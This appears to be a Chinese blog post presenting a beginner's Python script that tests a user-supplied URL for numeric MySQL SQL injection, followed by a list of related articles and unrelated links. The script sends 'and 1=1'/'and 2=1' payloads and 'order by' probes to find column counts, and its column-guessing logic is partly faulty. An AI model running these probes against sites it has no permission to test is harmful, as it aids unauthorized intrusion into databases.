前言:

总是想写一个sql注入脚本,但是之前的那些都不行。

这次做好了准备,然后嘿嘿嘿。

准备:

sql注入的基础知识

熟悉怎么判断

正文:

思路概念图:

这里我没有限制用户输入,不限制的话可能会 @&#@*#&@* = =

代码:

import requests

from bs4 import BeautifulSoup

import time

import re

import sys

def user():

    wailtfor=input('请输入你要进行sql注入测试的url:')

    print('------开启第一重验证------')

    url="{}".format(wailtfor)

    headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}

    request=requests.get(url=url,headers=headers,timeout=6)

    if request.status_code != 200:

        print('[-]抱歉该url十分的不稳定,退出程序中......')

        time.sleep(1)

        sys.exit()

    else:

        print('[+]第一重验证已经完成,目标是稳定的')

        journal=open('journal.txt','w',encoding='utf-8')

        journal.write('{}是稳定的\n'.format(url))

        journal.write('下一步进行判断是否存在注入')

        journal.close()

    print('------开启第二重测试------')

    def ceshi():

        pay1 = '%20and%201=1'

        pay2 = '%20and%202=1'

        Testinjection1 = request.url + pay1

        Testinjection2=request.url+pay2

        print('-------尝试数字型注入------')

        print(Testinjection1)

        print(Testinjection2)

        Testg=requests.get(Testinjection1,headers=headers)

        print(Testg.headers)

        Testg2=requests.get(Testinjection2,headers=headers)

        print(Testg2.headers)

        if Testg.text != Testg2.text:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2 = open('journal.txt', 'a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1, pay2))

            journal2.close()

            print('------开始猜字段数------')

        elif Testg.headers != Testg2.headers:

            print('[+]数字型注入成功,用到的payload:{},{}'.format(pay1,pay2),'可能存在注入点')

            journal2=open('journal.txt','a')

            journal2.write('数字型注入成功,用到的payload:{},{}'.format(pay1,pay2))

            journal2.close()

            print('------开始猜字段数------')

        else:

            print('[-]数字型注入失败')

            print('[!]尝试字符型注入')

            sys.exit()

        a='ooo'

        for s in range(1,100):

            if a=='xxx':break

            orpay=url+'%20order%20by%20{}'.format(s)

            res=requests.get(orpay,headers=headers)

            ewe=res.content

            lk=re.finditer('mysql_fetch_array()',str(ewe))

            for p in lk:

                print(str(p))

                g='''<_sre.SRE_Match object; span=(232, 249), match='mysql_fetch_array'>'''

                if str(p) == g:

                    print('字段数payload:', res.url)

                    dw = int(res.url[-1:])-1

                    print(type(dw))

                    print('字段数长度为:', dw)

                    a='xxx'

                else:

                    print('字段数payload:',res.url)

                    dw=int(res.url[-1:])-1

                    print('字段数长度为:',dw)

                    a='xxx'

    ceshi()

user()

  测试结果如下:

代码还有很多不足,诺各位大佬有什么好的意见请多多留言。 = =

最后送上一首歌:

python打造一个Mysql数字类型注入脚本(1)的更多相关文章

  1. python打造一个分析网站SQL注入的脚本

    前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx. ...

  2. MySQL数字类型中的三种常用种类

    数字类型 MySQL数字类型按照我的分类方法分为三类:整数类.小数类和数字类. MySQL数字类型之一我所谓的“数字类” 就是指 DECIMAL 和 NUMERIC,它们是同一种类型.它严格的说不是一 ...

  3. phantomjs + python 打造一个微信机器人

    phantomjs + python 打造一个微信机器人 1.前奏   媳妇公司不能上网,但经常需要在公众号上找一些文章做一些参考,需要的时候就把文章链接分享给我,然后我在浏览器打开网页,一点点复制过 ...

  4. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  5. 《Python核心编程》数字类型

    1.数字类型简单介绍 Python中数字类型包含:整型.长整型.布尔型.双精度浮点型.十进制浮点型.复数.这些数字类型都是不可变类型.也就是说,改变了数字的值会生成新的对象. 在Python中删除数字 ...

  6. MySQL数字类型学习笔记

    数字类型 最近在看<MySQL技术内幕:SQL编程>并做了笔记,所以本博客是一篇笔记类型博客,分享出来方便自己复习,也可以帮助他人 整型 类型 占用空间 最小值(SIGNED) 最大值(S ...

  7. MySQL数字类型int与tinyint、float与decimal如何选择

    最近在准备给开发做一个mysql数据库开发规范方面培训,一步一步来,结合在生产环境发现的数据库方面的问题,从几个常用的数据类型说起. int.tinyint与bigint 它们都是(精确)整型数据类型 ...

  8. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  9. python基本数据类型之数字类型和其相关运算

    数字(number) Python3 支持 int.float.bool.complex(复数). 在Python 3里,只有一种整数类型 int,表示为长整型,没有 python2 中的 Long. ...

随机推荐

  1. 十分钟释疑Oracle中“小表超慢”之谜(SQL调优/SQL优化)

    前几天,一个用户找到我,说查一个小表的时候非常慢,我问有多慢,他说最快也得半个小时才能出结果,有时干脆不出结果,我说小表多大,他说就几十兆,有点疑惑,让他帮忙获取了相关信息,一看就明白了,原来所谓的小 ...

  2. 如何解决python中使用flask时遇到的markupsafe._compat包缺失的问题

    在使用python进行GUI的程序编写时,使用flask时出现错误: 在使用pip freeze进行查看已下载的包时显示MarkupSafe与Jinjia2都已安装: 在网上查阅一些资料后发现,在py ...

  3. 项目Beta预备

    项目名称:城市安全风险管控系统 Beta预备: 讨论组长是否重选的议题和结论 项目组长可以说是一个团队的灵魂和核心.一个好的领导者可以激发团队成员的工作热情,提高开发效率,保质保量的完成工作.虽然在A ...

  4. day9

    Alpha冲刺Day9 一:站立式会议 今日安排: 经过为期5天的冲刺,基本完成企业人员模块的开发.因第三方机构与企业存在委托的关系.第三方人员对于风险的自查.风险列表的展示以及自查风险的统计展示(包 ...

  5. 开启Linux的share

    1.挂载Install  Vmare Tool 2.解压VMwareTools.tar.gz 3.安装share目录 4.shared Folders Enabled 添加共享的目录. 在自己的Unb ...

  6. Angular组件——组件生命周期(一)

    组件声明周期以及angular的变化发现机制 红色方法只执行一次. 变更检测执行的绿色方法和和组件初始化阶段执行的绿色方法是一个方法. 总共9个方法. 每个钩子都是@angular/core库里定义的 ...

  7. es6+react.js组件入门初探

    React是一个用于构建用户见面的javascript库. React主要用于构建UI,许多人认为React是MVC中的V(视图) React起源于Facebook的内部项目,用来架设Instagra ...

  8. mint-ui在vue中的使用。

    首先放上mint-ui中文文档 近来在使用mint-ui,发现部分插件在讲解上并不是很详细,部分实例找不到使用的代码.github上面的分享,里面都是markdown文件,内容就是网上的文档 刚好自己 ...

  9. js的构造函数共用事例

    在使用构造函数去实现一种功能时,我们有时候往往需要实现这个功能,会因此产生多个堆内对象.这样就会造成堆内存滥用.占用不该占用的空间.为此我们可以利用函数把共用的内容封装起来.放便我们的使用.很多东西其 ...

  10. Python内置函数(34)——map

    英文文档: map(function, iterable, ...) Return an iterator that applies function to every item of iterabl ...